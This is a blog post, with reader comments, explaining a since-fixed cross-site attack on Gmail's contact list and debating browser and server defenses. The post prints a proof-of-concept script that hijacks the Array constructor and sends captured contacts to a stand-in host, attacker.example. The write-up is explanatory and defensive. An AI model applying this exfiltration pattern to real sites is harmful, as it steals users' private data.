Interesting Ajax Attack

Jeremiah Grossman recently wrote up a very interesting attack (now fixed) on Gmail, which is worth looking at. The problem was that the Gmail client-side interface got your contact list by doing an XMLHttpRequest to a known URL which was the same for all accounts. The permission checks were, presumably, based entirely on your login cookies. The data arrived in the form of a JavaScript array which the client side then eval()ed. So the attack went like this:

  1. Send the victim’s Gmail account an email containing a link to a page under your control, and persuade them to click on it
  2. On that page, have a <script src="…"> tag accessing the well-known URL for getting the address book
  3. Gmail happily sends back the data, as the person is logged into Gmail and so the request has the correct cookies
  4. Override the anonymous Array() constructor with a function of your choice
  5. When the data arrives, the JS engine calls the anonymous Array constructor (even though it plans to throw away the result, as it’s not assigned to a variable), and therefore calls your function on the address book data, giving you access to it (see the sketch below).
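
Concretely, the attacker’s page might have looked something like the sketch below. The data URL is a placeholder rather than Gmail’s real endpoint, and the trick relied on the JavaScript engines of the time, which invoked a page-defined Array constructor when evaluating the returned array literal; current engines no longer do this.

    <script>
      var captured = {};   // plain object, so it is unaffected by the override
      var count = 0;
      // Replace the global Array constructor. In the vulnerable engines,
      // evaluating the array literal in the cross-domain response called this
      // function, letting us keep a reference to each array as it was built.
      function Array() {
        captured[count++] = this;
      }
    </script>

    <!-- The browser attaches the victim's Gmail cookies to this request,
         so the response is their contact list, expressed as a JS array. -->
    <script src="http://mail.google.com/PLACEHOLDER-contacts-url"></script>

    <script>
      // Read out the captured arrays and ship them to a collection point
      // (attacker.example is hypothetical).
      var out = "";
      for (var i = 0; i < count; i++) {
        out += captured[i].join(",") + ";";
      }
      new Image().src = "http://attacker.example/collect?d=" + encodeURIComponent(out);
    </script>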

Morals:

  • Ajax has new security risks associated with it
  • Don’t put sensitive data in pure JavaScript files with guessable URLs

Hmm. Would it break much of the web if we failed to send cookies on <script> src requests which were cross-domain?

11 thoughts on “Interesting Ajax Attack”

  1. That isn’t an Ajax attack; it’s simply a URL that returns JS with all the contact info. This could be achieved with NS 3 :)

    “Hmm. Would it break much of the web if we failed to send cookies on <script> src requests which were cross-domain?”

    Might cause ad agencies some problems, but I think we might want to try it and see. Or, could we add a way to create cookies that are not sent cross-domain (a special flag when creating them, through JS or HTTP)?
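
    For illustration only, such a flag might look like an extra attribute on the Set-Cookie header. The attribute name below is invented; nothing like it existed in browsers at the time:

        Set-Cookie: SESSION=abc123; Domain=mail.google.com; Path=/; Secure; CrossDomain=deny

    A browser honouring the hypothetical CrossDomain=deny attribute would omit the cookie from any request triggered by a page on another domain, including <script> src requests.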

  2. You forgot another moral: don’t log in to webmail;
    just use an email client, and take a USB key wherever you go.
    – Eldo

  3. > Hmm. Would it break much of the web if we failed to send cookies on <script> src requests which were cross-domain?

    It might affect “unified login systems” but other than that it sounds like a good idea to me.

    Wouldn’t it be nice if the JavaScript file itself could carry some metadata about which domains were allowed to execute it? Hmm, whilst a little dirty, something like this embedded into the JavaScript file and understood by browsers could be useful to prevent these kinds of things:

    /**
    * @domain-whitelist mail.google.com, gmail.com
    */

    Or maybe the whitelist could be sent via the HTTP headers?

  4. Doron: By “an Ajax attack”, I meant that Gmail is an Ajax implementation, and therefore exposes sensitive data in the form of a downloadable JavaScript structure – a fairly Ajaxy technique. This attack would work in the NS 3 browser, but not against any of the web apps around at that time.

    adriand: HTTP headers sound like a good plan to me. Why not allow it for all content? This would allow people to set up a mechanism to stop others embedding their images and stealing their bandwidth, for example. They could just set Use-Domain: http://www.mydomain.com, and the browser would refuse to display the image if it was embedded in another site. Would that be a good or a bad thing, I wonder?
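
    To make that concrete, the response for a protected image might carry the proposed header (Use-Domain is the hypothetical header suggested above, not anything browsers actually implement):

        HTTP/1.1 200 OK
        Content-Type: image/jpeg
        Use-Domain: http://www.mydomain.com

        (image data)

    A browser honouring it would compare the domain of the embedding page against the header value before rendering the image.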

  5. > Would that be a good or a bad thing, I wonder?
    Sounds pretty good to me. Of course, hotlink prevention can already be achieved with .htaccess rules and such, but doing so adds extra work for the server. Shifting the duty to the client side would be welcome.
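
    For comparison, a typical server-side hotlink rule looks something like this (Apache mod_rewrite; the domain is a placeholder):

        RewriteEngine On
        # Allow empty referers (direct requests, some proxies) and our own pages;
        # refuse image requests referred from anywhere else.
        RewriteCond %{HTTP_REFERER} !^$
        RewriteCond %{HTTP_REFERER} !^https?://(www\.)?mydomain\.com/ [NC]
        RewriteRule \.(gif|jpe?g|png)$ - [F]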

  6. “Would it break much of the web if we failed to send cookies on <script> src requests which were cross-domain?”
    IE6 already allows the user to block this kind of cookie as part of its P3P support. There were rumors that this behaviour would be the default in IE7.

  7. I dunno how effective client-side remote image blocking would be; you know someone would immediately write an extension to turn it off (and I would be the first to install it).

  8. Justin: But if site owners knew that, were they to steal images protected in this way, an unknown proportion of the viewing public simply wouldn’t see them, they’d be much less likely to do it.

  9. I wonder if the web sites that provide this sort of data service could protect themselves by setting a login cookie and checking the referrer header: if the domain/path in the referrer header matches an accepted site, then allow the request. I know it is possible to spoof the referrer, but spoofing that in combination with the login cookie (as long as the login cookie was set to the correct, very narrow domain) seems like it would be enough protection?

    This assumes the only ways to spoof the referrer are: a client-side extension or modification to the browser (in which case the system is already compromised, and much more damage can be done than just this issue); a proxy that alters the headers (the proxy could be browser-configured, but that also seems like a client-side exploit with much more damaging consequences); or sending the script src request to the hacker’s site, which adjusts the request to change the referrer. In that last case, though, the login cookie should not travel, since the domains would not match.

    If all of that holds (which it may not), then it seems like it is the responsibility of the data service to adequately protect itself, and not a requirement on the browser to do extra work.
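
    A minimal sketch of the check described above, assuming a request object carrying headers and cookies and an isValidSession helper (all hypothetical names, not Gmail’s actual implementation):

        // Serve the contact data only when the session cookie is valid AND
        // the referrer is one of the service's own pages.
        var ALLOWED_REFERERS = [/^https?:\/\/mail\.google\.com\//]; // illustrative

        function shouldServeContacts(request, isValidSession) {
          if (!isValidSession(request.cookies["session"])) {
            return false;                        // no (or invalid) login cookie
          }
          var referer = request.headers["referer"] || "";
          for (var i = 0; i < ALLOWED_REFERERS.length; i++) {
            if (ALLOWED_REFERERS[i].test(referer)) {
              return true;                       // request came from our own page
            }
          }
          return false;                          // cross-site <script> src: refuse
        }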